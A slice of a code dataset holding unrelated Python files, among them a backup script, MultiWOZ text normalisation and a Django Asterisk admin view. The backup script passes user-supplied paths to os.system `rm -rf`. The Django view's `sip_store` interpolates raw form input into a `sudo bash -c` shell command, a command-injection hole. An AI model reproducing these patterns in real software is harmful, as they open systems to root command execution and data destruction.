this\ndirectory\n\"\"\"\n# Copyright (C) 2015 by\n# Colin Dablain \n# All rights reserved.\n# Licensed under GNU GPL v3; see license.txt\n\nimport readwrite\nimport os\n\ndef get_path(custom_message=False):\n\twhile True:\n\t\tpath = \"\"\n\t\tif (custom_message):\n\t\t\tpath = raw_input(custom_message)\n\t\telse:\n\t\t\tpath = raw_input(\"Enter a path: \")\n\t\ttry: # check if specified path exists\n\t\t\tos.chdir(path)\n\t\t\tprint(\"That path resolves to \\\"%s\\\"\" % path)\n\t\t\tcheck = raw_input(\"Is this correct?(y/n): \")\n\t\t\tif (check == 'y'): # if the path is correct\n\t\t\t\treturn path\n\t\t\telse: # if it isn't \n\t\t\t\tprint(\"\\nTry adding a / to the beginning of your \"\n\t\t\t\t \"path\\n\\n\")\n\t\texcept OSError: # if the system determiens the path isn't real\n\t\t\tprint(\"\\nERROR: path \\\"%s\\\" does not exist\"\n\t\t\t % path)\n\t\t\tprint(\"Try adding a / to the beginning of your path\\n\\n\")\n\t\t\n\nif __name__ == \"__main__\":\n\t##########\n\t# prints some details about the script to the console\n\t##########\n\tos.system(\"clear\")\n\tprint(\"BACKUP SCRIPT:\\n\")\n\tprint(\"NOTE: You should have already run the setup.py script to \"\n\t \"configure your\\nbackup directories. 
Otherwise this script \"\n\t \"will quit very quickly.\\n\\n\\n\")\n\t##########\n\t##########\n\t# attempts to load a configuration file in the current directory.\n\t# if it doesn't find one, it'll ask you for a directory to go to\n\t# and look for one there.\n\t##########\n\t##########\n\tdata = \"\"\n\tnot_found = True\n\ttry: # searches for the config file in your current directory\n\t\tf = open(\"config.json\", \"r\")\n\t\tdata = readwrite.read(f)\n\t\tnot_found = False\n\texcept: # if the config file is not found in the current directory\n\t\tprint(\"\\nERROR: file \\\"%s\\\" does not exist\\n\"\n\t\t\t % (os.getcwd() + \"/config.json\"))\n\t\tprint(\"Will now search for the config file in some other \"\n\t\t \"directory\\n\\n\")\n\t##########\n\t# if it doesn't find a config file in the current directory,\n\t# search for one in another directory\n\t##########\n\twhile not_found:\n\t\tpath = get_path(\"Enter an alternative directory to search \"\n\t\t \"for the config file in: \")\n\t\ttry:\n\t\t\tf = open(\"config.json\", \"r\")\n\t\t\tdata = readwrite.read(f)\n\t\t\tnot_found = False\n\t\texcept:\n\t\t\tos.system(\"clear\")\n\t\t\tprint(\"\\nERROR: file \\\"%s\\\" does not exist\\n\"\n\t\t\t % (path + \"/config.json\"))\n\t\t\tprint(\"We will now continue to search for the config file \"\n\t\t\t \"in some other directory\\n\")\n\n\t##########\n\t# start rsyncing\n\t##########\n\tmaximum = int(data['maximum'])\n\tprint(\"rm -rf %s/rsync.%s\" % (path, maximum))\n\tos.system(\"rm -rf %s/rsync.%s\" % (path, maximum))\n\tcount = maximum\n\twhile (count > 1):\n\t\tprint(\"mv %s/rsync.%s %s/rsync.%s\"\n\t\t % (path, count - 1, path, count))\n\t\tos.system(\"mv %s/rsync.%s %s/rsync.%s\"\n\t\t % (path, count - 1, path, count))\n\t\tcount -= 1\n\t# while\n\tprint(\"mv %s/rsync %s/rsync.1\" % (path, path))\n\tos.system(\"mv %s/rsync %s/rsync.1\" % (path, path))\n\n\t# Stopped here rsync -aP --link-dest=PATHTO/$PREVIOUSBACKUP $SOURCE $CURRENTBACKUP\n\t# https://blog.interlinked.org/tutorials/rsync_time_machine.html\n\tos.system(\"rsync -v -rlt -z --delete \\\"%s\\\" %s/rsync\"\n\t % (data[\"source\"], data[\"destination\"]))\n","sub_path":"src/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"586279327","text":"from Death_cases import *\n\nnumfile = \"num.csv\"\ntotal_csv= \"confirm.csv\"\ndeath_csv = \"Death.csv\"\nrecovered_csv = \"recovered.csv\"\nallData = \"alldata.csv\"\nDate_csv = \"Date.csv\"\nwith open(numfile, newline='') as f:\n reader = csv.reader(f)\n Days = list(reader)\n\nwith open(total_csv) as csvfile:\n tlines = [line.split(\"\\n\", ) for line in csvfile.readlines()]\n Cases = [\" \".join(line) for line in tlines]\n\nwith open(death_csv) as csvfile:\n tlines = [line.split(\"\\n\", ) for line in csvfile.readlines()]\n Death = [\" \".join(line) for line in tlines]\n\nwith open(recovered_csv) as csvfile:\n tlines = [line.split(\"\\n\", ) for line in csvfile.readlines()]\n Recover = [\" \".join(line) for line in tlines]\n\nwith open(\"Date.csv\") as csvfile:\n tlines = [line.split(\"\\n\", ) for line in csvfile.readlines()]\n Date = [\" \".join(line) for line in tlines]\n\n#print(\"\\n S.no =\",Days)\n#print(\"\\n total cases = \",Cases)\n#print(\"\\n recover = \",recover)\n#print(\"\\n deaths = \",Death)\n\nded = Death\nday = Date\nrec = Recover\ncas = Cases\n\nf = open(\"alldata.csv\", \"w\")\n\nfor i in range(len(day)):\n f.write(\"{},{},{},{}\\n 
\".format(day[i], ded[i], rec[i], cas[i]))\n\nf.close()\n\nimport csv\nwith open(allData,newline='') as f:\n r = csv.reader(f)\n data = [line for line in r]\nwith open('Data.csv','w',newline='') as f:\n w = csv.writer(f)\n w.writerow(['Day','Dead','Recover','Total Case'])\n w.writerows(data)\n\n\n\n\n","sub_path":"Covid Prediction app/covid/covid_ml/Covid_Data.py","file_name":"Covid_Data.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"446987810","text":"import time\nimport random\nfrom demos import quicksort, mergesort\n\ndef create_random_list(size, max_val):\n ran_list = []\n for num in range(size):\n ran_list.append(random.randint(1,max_val))\n return ran_list\n\n# For those of you who are familiar with list comprehension covered\n# in section 3, the code in the function above can be written as below:\n\n# def create_random_list(size, max_val):\n# return [random.randint(1,max_val) for num in range(size)]\n\nsize = int(input(\"What size list do you want to create? \"))\nmax = int(input(\"What is the max value of the range? \"))\n\nl = create_random_list(size,max)\ntic = time.time()\nquicksort(l)\ntoc = time.time()\nprint(\"QS elapsed time -> \", toc-tic)\ntic = time.time()\nmergesort(l)\ntoc = time.time()\nprint(\"MS elapsed time -> \", toc-tic)\n","sub_path":"Python 3 Project-based Python, Algorithms, Data Structures/template/Section 4 Algorithms - Sort, performance, complexity and big O notation/70. Project phase 3/analyzer-c.py","file_name":"analyzer-c.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"341047003","text":"from collections.abc import Sequence, MutableMapping\r\nfrom concurrent.futures import ThreadPoolExecutor, Future\r\nfrom functools import wraps\r\n\r\nfrom distributed import default_client as dask_default_client\r\nfrom tornado import gen\r\n\r\nfrom .core import identity\r\n\r\nFILL_COLOR_LOOKUP = {\"dask\": \"cornflowerblue\", \"threads\": \"coral\"}\r\n\r\n\r\ndef result_maybe(future_maybe):\r\n if isinstance(future_maybe, Future):\r\n return future_maybe.result()\r\n else:\r\n if isinstance(future_maybe, Sequence) and not isinstance(\r\n future_maybe, str\r\n ):\r\n aa = []\r\n for a in future_maybe:\r\n aa.append(result_maybe(a))\r\n if isinstance(future_maybe, tuple):\r\n aa = tuple(aa)\r\n return aa\r\n elif isinstance(future_maybe, MutableMapping):\r\n for k, v in future_maybe.items():\r\n future_maybe[k] = result_maybe(v)\r\n return future_maybe\r\n\r\n\r\ndef delayed_execution(func):\r\n @wraps(func)\r\n def inner(*args, **kwargs):\r\n args = tuple([result_maybe(v) for v in args])\r\n kwargs = {k: result_maybe(v) for k, v in kwargs.items()}\r\n return func(*args, **kwargs)\r\n\r\n return inner\r\n\r\n\r\ndef executor_to_client(executor):\r\n executor._submit = executor.submit\r\n\r\n @wraps(executor.submit)\r\n def inner(fn, *args, **kwargs):\r\n wfn = delayed_execution(fn)\r\n return executor._submit(wfn, *args, **kwargs)\r\n\r\n executor.submit = inner\r\n\r\n @gen.coroutine\r\n def scatter(x, asynchronous=True):\r\n f = executor.submit(identity, x)\r\n return f\r\n\r\n executor.scatter = getattr(executor, \"scatter\", scatter)\r\n\r\n @gen.coroutine\r\n def gather(x, asynchronous=True):\r\n # If we have a sequence of futures await each one\r\n if isinstance(x, Sequence):\r\n final_result = []\r\n for sub_x in x:\r\n yx = yield sub_x\r\n 
final_result.append(yx)\r\n result = type(x)(final_result)\r\n else:\r\n result = yield x\r\n return result\r\n\r\n executor.gather = getattr(executor, \"gather\", gather)\r\n return executor\r\n\r\n\r\nthread_ex_list = []\r\n\r\n\r\ndef thread_default_client():\r\n if thread_ex_list:\r\n ex = thread_ex_list[0]\r\n if ex._shutdown:\r\n thread_ex_list.pop()\r\n ex = executor_to_client(ThreadPoolExecutor())\r\n thread_ex_list.append(ex)\r\n else:\r\n ex = executor_to_client(ThreadPoolExecutor())\r\n thread_ex_list.append(ex)\r\n return ex\r\n\r\n\r\nDEFAULT_BACKENDS = {\r\n \"dask\": dask_default_client,\r\n \"thread\": thread_default_client,\r\n}\r\n","sub_path":"rapidz/clients.py","file_name":"clients.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"360063690","text":"import sys\nimport csv\nimport xml.etree.ElementTree as ET\n\n\nif len(sys.argv) != 2:\n print(\"Usage: ToCSV.py file\")\n sys.exit()\n \n\nChar = ET.parse(sys.argv[1])\nroot = Char.getroot() \n\nprint(root.attrib['name'])\n\nOutputFile = \"csv/\" + root.attrib['name'] + \".csv\" \n\nwith open(OutputFile, 'w', newline='') as csvfile:\n MoveWriter = csv.writer(csvfile, delimiter=',')\n MoveWriter.writerow([\"Move ID\", \"Move\", \"Command\", \"hitLevel\", \"BlockFrame\", \"Punishable\", \"Duckable\"])\n for move in root.findall('moves/move'):\n if(len(move.findall(\"tags/Punishable\")) > 0):\n Punishable = True\n else:\n Punishable = False\n \n if(len(move.findall(\"tags/DuckableString\")) > 0):\n Duckable = True\n else:\n Duckable = False\n MoveWriter.writerow([move.findall(\"id\")[0].text, move.findall(\"name\")[0].text, move.findall(\"command\")[0].text, move.findall(\"hitLevel\")[0].text, move.findall(\"BlockFrame\")[0].text, Punishable, Duckable])\n","sub_path":"TekkenData/Movelists/ToCSV.py","file_name":"ToCSV.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"86398851","text":"#-*- encoding: utf-8 -*-\nimport json\nimport re\n\ntimepat = re.compile(\"\\d{1,2}[:]\\d{1,2}\")\npricepat = re.compile(\"\\d{1,3}[.]\\d{1,2}\")\ndef insertSpace(token, text):\n sidx = 0\n while True:\n sidx = text.find(token, sidx)\n if sidx == -1:\n break\n if sidx + 1 < len(text) and re.match('[0-9]', text[sidx - 1]) and \\\n re.match('[0-9]', text[sidx + 1]):\n sidx += 1\n continue\n if text[sidx - 1] != ' ':\n text = text[:sidx] + ' ' + text[sidx:]\n sidx += 1\n if sidx + len(token) < len(text) and text[sidx + len(token)] != ' ':\n text = text[:sidx + 1] + ' ' + text[sidx + 1:]\n sidx += 1\n return text\n\ndef normalize(text, replacements = []):\n # lower case every word\n text = text.lower()\n\n # replace white spaces in front and end\n text = re.sub(r'^\\s*|\\s*$', '', text)\n\n # hotel domain pfb30\n text = re.sub(r\"b&b\", \"bed and breakfast\", text)\n text = re.sub(r\"b and b\", \"bed and breakfast\", text)\n\n # normalize phone number\n ms = re.findall('\\(?(\\d{3})\\)?[-.\\s]?(\\d{3})[-.\\s]?(\\d{4,5})', text)\n if ms:\n sidx = 0\n for m in ms:\n sidx = text.find(m[0], sidx)\n if text[sidx - 1] == '(':\n sidx -= 1\n eidx = text.find(m[-1], sidx) + len(m[-1])\n text = text.replace(text[sidx:eidx], ''.join(m))\n\n # normalize postcode\n ms = re.findall('([a-z]{1}[\\. ]?[a-z]{1}[\\. ]?\\d{1,2}[, ]+\\d{1}[\\. ]?[a-z]{1}[\\. 
]?[a-z]{1}|[a-z]{2}\\d{2}[a-z]{2})',\n text)\n if ms:\n sidx = 0\n for m in ms:\n sidx = text.find(m, sidx)\n eidx = sidx + len(m)\n text = text[:sidx] + re.sub('[,\\. ]', '', m) + text[eidx:]\n\n # weird unicode bug\n text = re.sub(u\"(\\u2018|\\u2019)\", \"'\", text)\n\n # replace time and and price\n text = re.sub(timepat, ' [value_time] ', text)\n text = re.sub(pricepat, ' [value_price] ', text)\n #text = re.sub(pricepat2, '[value_price]', text)\n\n # replace st.\n text = text.replace(';', ',')\n text = re.sub('$\\/', '', text)\n text = text.replace('/', ' and ')\n\n # replace other special characters\n text = text.replace('-', ' ')\n text = re.sub('[\\\":\\<>@\\(\\)]', '', text)\n\n # insert white space before and after tokens:\n for token in ['?', '.', ',', '!']:\n text = insertSpace(token, text)\n\n # insert white space for 's\n text = insertSpace('\\'s', text)\n\n # replace it's, does't, you'd ... etc\n text = re.sub('^\\'', '', text)\n text = re.sub('\\'$', '', text)\n text = re.sub('\\'\\s', ' ', text)\n text = re.sub('\\s\\'', ' ', text)\n for fromx, tox in replacements:\n text = ' ' + text + ' '\n text = text.replace(fromx, tox)[1:-1]\n\n # remove multiple spaces\n text = re.sub(' +', ' ', text)\n\n # concatenate numbers\n tmp = text\n tokens = text.split()\n i = 1\n while i < len(tokens):\n if re.match(u'^\\d+$', tokens[i]) and \\\n re.match(u'\\d+$', tokens[i - 1]):\n tokens[i - 1] += tokens[i]\n del tokens[i]\n else:\n i += 1\n text = ' '.join(tokens)\n return text\n## codes from multiwoz2.1 end\n\ndef restore_common_abbr(caption):\n # 还原常见缩写单词\n pat_is = re.compile(\"(it|he|she|that|this|there|here)(\\'s)\", re.I)\n pat_blank = re.compile(\"[\\t ]+\")\n pat_s = re.compile(\"(?<=[a-zA-Z])\\'s\") # 找出字母后面的字母\n pat_s2 = re.compile(\"(?<=s)\\'s?\")\n pat_not = re.compile(\"(?<=[a-zA-Z])n\\'t\") # not的缩写\n pat_would = re.compile(\"(?<=[a-zA-Z])\\'d\") # would的缩写\n pat_will = re.compile(\"(?<=[a-zA-Z])\\'ll\") # will的缩写\n pat_am = re.compile(\"(?<=[I|i])\\'m\") # am的缩写\n pat_are = re.compile(\"(?<=[a-zA-Z])\\'re\") # are的缩写\n pat_ve = re.compile(\"(?<=[a-zA-Z])\\'ve\") # have的缩写\n\n new_text = caption\n new_text = pat_is.sub(r\"\\1 is\", new_text)\n new_text = pat_blank.sub(\" \", new_text)#remove redundant blank space\n new_text = pat_s.sub(\"\", new_text)\n new_text = pat_s2.sub(\"\", new_text)\n new_text = pat_not.sub(\" not\", new_text)\n new_text = pat_would.sub(\" would\", new_text)\n new_text = pat_will.sub(\" will\", new_text)\n new_text = pat_am.sub(\" am\", new_text)\n new_text = pat_are.sub(\" are\", new_text)\n new_text = pat_ve.sub(\" have\", new_text)\n new_text = new_text.replace('\\'', ' ')\n return new_text\n\n\nTYPOS_CORRECT = 0\nGENERAL_TYPO = {\n # type\n \"guesthouse\":\"guest house\", \"guesthouses\":\"guest house\", \"guest\":\"guest house\", \"mutiple sports\":\"multiple sports\", \n \"sports\":\"multiple sports\", \"mutliple sports\":\"multiple sports\",\"swimmingpool\":\"swimming pool\", \"concerthall\":\"concert hall\", \n \"concert\":\"concert hall\", \"pool\":\"swimming pool\", \"night club\":\"nightclub\", \"mus\":\"museum\", \"ol\":\"architecture\", \n \"colleges\":\"college\", \"coll\":\"college\", \"architectural\":\"architecture\", \"musuem\":\"museum\", \"churches\":\"church\",\n # area\n \"center\":\"centre\", \"center of town\":\"centre\", \"near city center\":\"centre\", \"in the north\":\"north\", \"cen\":\"centre\", \"east side\":\"east\", \n \"east area\":\"east\", \"west part of town\":\"west\", \"ce\":\"centre\", \"town 
center\":\"centre\", \"centre of cambridge\":\"centre\", \n \"city center\":\"centre\", \"the south\":\"south\", \"scentre\":\"centre\", \"town centre\":\"centre\", \"in town\":\"centre\", \"north part of town\":\"north\", \n \"centre of town\":\"centre\", \"cb30aq\": \"none\",\n # price\n \"mode\":\"moderate\", \"moderate -ly\": \"moderate\", \"mo\":\"moderate\", \"moderately\": \"moderate\",\n # day\n \"next friday\":\"friday\", \"monda\": \"monday\", \"thur\": \"thursday\",\n # parking\n \"free parking\":\"free\",\n # internet\n \"free internet\":\"yes\",\n # star\n \"4 star\":\"4\", \"4 stars\":\"4\", \"0 star rarting\":\"none\",\n # others \n \"dont care\": \"dontcare\", \"y\":\"yes\", \"any\":\"dontcare\", \"n\":\"no\", \"does not care\":\"dontcare\", \"not men\":\"none\", \"not\":\"none\", \"not mentioned\":\"none\", \"not given\": \"none\",\n '':\"none\", \"not mendtioned\":\"none\", \"3 .\":\"3\", \"does not\":\"no\", \"fun\":\"none\", \"art\":\"none\", \"dont care\": \"dontcare\", \"don't care\": \"dontcare\", \"doesn't care\": \"dontcare\",\n \"w\": \"none\",\n # LBZ adding\n #restaurant name\n \"not(hamilton lodge)\": \"not hamilton lodge\",\n \"golden house golden house\": \"golen house\",\n # taxi-leave at\n \"0700\": \"07:00\", \"300\": \"03:00\", \"1615\": \"16:15\", \"20.00\": \"20:00\", \"16.30\": \"16:30\", \"21:4\": \"21:04\", \"1530\": \"15:30\", \"1145\": \"11:45\", \"1545\": \"15:45\", \"1745\": \"17:45\", \"1830\": \"18:30\",\n \"`1\": \"1\",\n \"02:45.\": \"02:45\",\n \"5:45\": \"05:45\",\n \"1:15\": \"01:15\",\n \"3:00\": \"03:00\",\n \"4:15\": \"04:15\",\n \"8:30\": \"08:30\",\n \"3:45\": \"03:45\",\n \"8:15\": \"08:15\",\n \"9:30\": \"09:30\",\n \"3:15\": \"03:15\",\n \"9:00\": \"09:00\",\n \"1:00\": \"01:00\",\n \"5:15\": \"05:15\",\n \"4:45\": \"04:45\",\n \"21:04\": \"21:04\",\n \"9:15\": \"09:15\",\n \"6:00\": \"06:00\",\n \"1700\": \"17:00\",\n \"5:30\": \"05:30\",\n \"1730\": \"17:30\",\n \"9:45\": \"09:45\",\n \"2:00\": \"02:00\",\n \"1:00\": \"01:00\",\n \"9:15\": \"09:15\",\n \"8:45\": \"08:45\",\n \"8:30\": \"08:30\",\n \"1030\": \"10:30\",\n \"7:54\": \"07:54\",\n \"2:30\": \"02:30\",\n \"9:30\": \"09:30\",\n \"13.29\": \"13:29\",\n \"1700\": \"17:00\",\n \"8:00\": \"08:00\",\n \"6:55\": \"06:55\",\n \"15.45\": \"15:45\",\n \"8:30\": \"08:30\",\n \"9:30\": \"09:30\",\n \"15.32\": \"15:32\",\n \"11.45\": \"11:45\",\n \"after 5:45 pm\": \"17:45\",\n \"09;45\": \"09:45\",\n \"11.24\": \"11:24\",\n \"11.45\": \"11:45\",\n \"18.15\": \"18:15\",\n # hotel book people\n \"six\": \"6\",\n \"3.\": \"3\",\n }\n\ndef fix_general_label_error(domain, slot, value):\n \"\"\"\n process label value\n \"\"\"\n if len(value) == 0:\n return \"\"\n \n if value in GENERAL_TYPO.keys():\n # general typo\n global TYPOS_CORRECT\n TYPOS_CORRECT += 1\n value = GENERAL_TYPO[value]\n # miss match slot and value\n if domain == \"hotel\" and (slot == \"type\" and value in [\"nigh\", \"moderate -ly priced\", \"bed and breakfast\", \"centre\", \"venetian\", \"intern\", \"a cheap -er hotel\"] or \\\n slot == \"internet\" and value == \"4\" or \\\n slot == \"price range\" and value == \"2\") or \\\n domain == \"attraction\" and slot == \"type\" and value in [\"gastropub\", \"la raza\", \"galleria\", \"gallery\", \"science\", \"m\"] or \\\n \"area\" in slot and value in [\"moderate\"] or \\\n \"day\" in slot and value == \"t\":\n value = \"none\"\n elif domain == \"hotel\" and slot == \"type\" and value in [\"hotel with free parking and free wifi\", \"4\", \"3 star hotel\"]:\n value = 
\"hotel\"\n elif domain == \"hotel\" and slot == \"star\" and value == \"3 star hotel\":\n value = \"3\"\n elif \"area\" in slot:\n if value == \"no\": value = \"north\"\n elif value == \"we\": value = \"west\"\n elif value == \"cent\": value = \"centre\"\n elif \"day\" in slot:\n if value == \"we\": value = \"wednesday\"\n elif value == \"no\": value = \"none\"\n elif \"price\" in slot and value == \"ch\":\n value = \"cheap\"\n elif \"internet\" in slot and value == \"free\":\n value = \"yes\"\n \n # some out-of-define classification slot values\n if domain == \"restaurant\" and slot == \"area\" and value in [\"stansted airport\", \"cambridge\", \"silver street\"] or \\\n domain == \"attraction\" and slot == \"area\" and value in [\"norwich\", \"ely\", \"museum\", \"same area as hotel\"]:\n value = \"none\"\n if domain == \"hotel\" and slot == 'name' and value in [\"no\", \"yes\"]:\n value = \"none\"\n if domain == \"restaurant\" and slot == 'name' and value in [\"no\", \"yes\"]:\n value = \"none\"\n return value\n\n\ndef normalize_state_value(domain, slot, value, replacements, remove_none = True):\n if value in [\"not mentioned\", \"none\", \"\"]:\n values = []\n elif \"|\" in value:\n # we do not fix multivalue label here\n values = []\n for item in value.split(\"|\"):\n value_i = fix_general_label_error(domain, slot, item.strip())\n value_i = normalize(value_i, replacements)\n value_i = restore_common_abbr(value_i)\n values.append(value_i)\n else:\n # fix some general errors\n value = fix_general_label_error(domain, slot, value)\n value = normalize(value, replacements)\n value = restore_common_abbr(value)\n values = [value]\n return values\n\ndef comparison_of_versions():\n base_path22 = \"./version22/data/\"\n data_files = {\n 10: base_path22 + \"MultiWOZ_1.0/data.json\",\n 20: base_path22 + \"MultiWOZ_2.0/data.json\",\n 21: base_path22 + \"MultiWOZ_2.1/data.json\",# val txt\n 22: base_path22 + \"MultiWOZ_2.2/data.json\",\n 23: \"./version23/data.json\",\n 24: \"./version24/data/data.json\"\n }\n\n val_files = {\n 10: base_path22 + \"MultiWOZ_1.0/valListFile.json\",\n 20: base_path22 + \"MultiWOZ_2.0/valListFile.json\",\n 21: base_path22 + \"MultiWOZ_2.1/valListFile.txt\",\n 22: base_path22 + \"MultiWOZ_2.1/valListFile.txt\",\n }\n\n test_files = {\n 10: base_path22 + \"MultiWOZ_1.0/testListFile.json\",\n 20: base_path22 + \"MultiWOZ_2.0/testListFile.json\",\n 21: base_path22 + \"MultiWOZ_2.1/testListFile.txt\",\n 22: base_path22 + \"MultiWOZ_2.1/testListFile.txt\",\n }\n data = {}\n for i in data_files:\n data[i] = json.load(open(data_files[i]))\n print(i, len(data[i].keys()))\n\nif __name__ == \"__main__\":\n pass\n\n","sub_path":"data/multiwoz/analyze_multiwoz.py","file_name":"analyze_multiwoz.py","file_ext":"py","file_size_in_byte":11550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"62553961","text":"n, m, k = (int(x) for x in input().split())\r\nA = [int(x) for x in input().split()]\r\nB = [int(x) for x in input().split()]\r\ntoLook = {}\r\nfor i in B:\r\n toLook[i] = 1\r\nl = 0\r\nr = 0\r\nfreq = {}\r\ncnt = 0 \r\nminm = 1000000\r\nwhile l < n:\r\n while r < n and cnt < k:\r\n if A[r] in toLook:\r\n if A[r] in freq:\r\n if freq[A[r]] == 0:\r\n cnt += 1\r\n freq[A[r]] += 1\r\n else:\r\n freq[A[r]] = 1\r\n cnt += 1\r\n r += 1\r\n if cnt >= k:\r\n if r - l < minm:\r\n minm = r - l\r\n else: break\r\n if A[l] in toLook:\r\n if A[l] in freq:\r\n if freq[A[l]] == 1:\r\n cnt -= 1\r\n freq[A[l]] -= 1\r\n l += 1\r\n\r\nif minm == 
1000000: minm = -1\r\nprint(minm)","sub_path":"Shortest Length.py","file_name":"Shortest Length.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"523689521","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpRequest\nimport telnetlib, psutil, shlex, subprocess, os\n\n\n# Create your views here.\n\ndef index(request):\n return render(request, 'sip/page-login.html')\n\n\ndef login(request):\n HOST = \"127.0.0.1\"\n PORT = \"5038\"\n user = \"\"\n secret = \"\"\n tn = telnetlib.Telnet(HOST, PORT)\n if request.method == 'GET':\n data = request.GET\n user = 'Username:' + data['username']\n secret = 'Secret:' + data['password']\n elif request.method == 'POST':\n data = request.POST\n user = 'Username:' + data['username']\n secret = 'Secret:' + data['password']\n tn.write(b'Action:Login\\r\\n')\n tn.write(user.encode('ascii') + b'\\r\\n')\n tn.write(secret.encode('ascii') + b'\\r\\n')\n tn.write(b'\\r\\n')\n tn.write(b'Action:LogOff\\r\\n')\n tn.write(b'\\r\\n\\r\\n')\n response = tn.read_all()\n response = response.decode(\"UTF-8\")\n resp = \"Authentication accepted\" in response\n if resp:\n return redirect('dashboard')\n else:\n return redirect('connexion')\n\n\ndef dashboard(request):\n cmd = shlex.split(\"sudo /usr/sbin/asterisk -rx 'core show uptime'\")\n command = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = command.communicate()\n uptime = stdout.decode('UTF-8')\n cmd = shlex.split(\"sudo /usr/sbin/asterisk -rx 'sip show peers'\")\n command = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = command.communicate()\n entete = list(filter(None, stdout.decode('UTF-8').split('\\n')[0].split(' ')))\n result = stdout.decode('UTF-8').split('\\n')\n result.pop(0)\n result.pop()\n stat = result.pop()\n sips = []\n for element in result:\n elet = list(filter(None, element.split(' ')))\n sips.append({\n 'name': elet[0],\n 'hote': elet[1],\n 'port': elet[6],\n 'status': elet[7]\n })\n context = {\n 'uptime': uptime,\n 'pourcentage': int(psutil.virtual_memory()[2]),\n 'processeur': int(psutil.cpu_percent()),\n 'sip': sips,\n 'stat': stat\n }\n return render(request, 'sip/index.html', context)\n\n\ndef sip_index(request):\n cmd = shlex.split(\"sudo /usr/sbin/asterisk -rx 'sip reload'\")\n command = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = command.communicate()\n cmd = shlex.split(\"sudo /usr/sbin/asterisk -rx 'sip show peers'\")\n command = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = command.communicate()\n entete = list(filter(None, stdout.decode('UTF-8').split('\\n')[0].split(' ')))\n result = stdout.decode('UTF-8').split('\\n')\n result.pop(0)\n result.pop()\n stat = result.pop()\n sips = []\n for element in result:\n elet = list(filter(None, element.split(' ')))\n sips.append({\n 'name': elet[0],\n 'hote': elet[1],\n 'port': elet[6],\n 'status': elet[7]\n })\n context = {\n 'sip': sips,\n 'stat': stat\n }\n return render(request, 'sip/sip.html', context)\n\n\ndef sip_store(request):\n sip_user_info = \"\\n[{}](default_template) \\nfullname ={} \\nusername ={} \\nsecret={} \\nmailbox ={} \\ncontext=dept_1\".format(request.POST['extension'],request.POST['full_name'], request.POST['username'],request.POST['password'],request.POST['extension'])\n os.system(\"sudo bash -c 'echo \\\"{}\\\" 
>> /etc/asterisk/users.conf'\".format(sip_user_info))\n cmd = shlex.split(\"sudo /usr/sbin/asterisk -rx 'sip reload'\")\n command = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = command.communicate()\n return redirect('sip.index')\n","sub_path":"sip/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"300137785","text":"\"\"\"\nProblem:\n You are a professional robber planning to rob houses along a street.\n Each house has a certain amount of money stashed,\n the only constraint stopping you from robbing each of them is that\n adjacent houses have security system connected and\n it will automatically contact the police\n if two adjacent houses were broken into on the same night.\n\n Given a list of non-negative integers representing the amount of money\n of each house, determine the maximum amount of money you can rob tonight\n without alerting the police.\n\n Example 1:\n\n Input: [1,2,3,1]\n Output: 4\n Explanation: Rob house 1 (money = 1) and then rob house 3 (money = 3).\n Total amount you can rob = 1 + 3 = 4.\n Example 2:\n\n Input: [2,7,9,3,1]\n Output: 12\n Explanation:\n Rob house 1 (money = 2),\n rob house 3 (money = 9)\n and rob house 5 (money = 1).\n Total amount you can rob = 2 + 9 + 1 = 12.\n\"\"\"\n\nclass Solution:\n def rob(self, nums: list) -> int:\n if len(nums) == 0:\n return 0\n if len(nums) == 1:\n return nums[0]\n if len(nums) == 2:\n return max(nums[0], nums[1])\n\n # For every house after the second house, the maximum profit will either be\n # the current house + the profit of two houses ago, or don't rob the house.\n dp = [nums[0], max(nums[0], nums[1])]\n for i in range(2, len(nums)):\n res = max(nums[i]+dp[i-2], dp[i-1])\n dp.append(res)\n return dp[-1]\n\n\ndef test():\n nums = [1, 2, 3]\n s = Solution()\n res = s.rob(nums)\n assert res == 4\n\n\nif __name__ == '__main__':\n test()\n nums = eval(input('Please input an array: '))\n s = Solution()\n res = s.rob(nums)\n print(res)\n","sub_path":"problems/0198_house_robber.py","file_name":"0198_house_robber.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"316438183","text":"from tortoise import Model, fields\n\n\nclass Flat(Model):\n id = fields.IntField(pk=True)\n url = fields.CharField(null=False, max_length=2048, unique=True)\n price = fields.IntField(null=False)\n is_published = fields.BooleanField(default=False)\n\n created_at = fields.DatetimeField(auto_now_add=True)\n","sub_path":"src/db/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"213968099","text":"import numpy as np\nfrom PIL import Image\n\ndef standardize_stats(TRAIN_LEN, base_path):\n combined_data = np.zeros((TRAIN_LEN, 228, 228, 6))\n for i in range(TRAIN_LEN):\n annotation = np.load(base_path + '/box_annotations/' + str(i) + '.npy')\n combined_data[i] = annotation\n 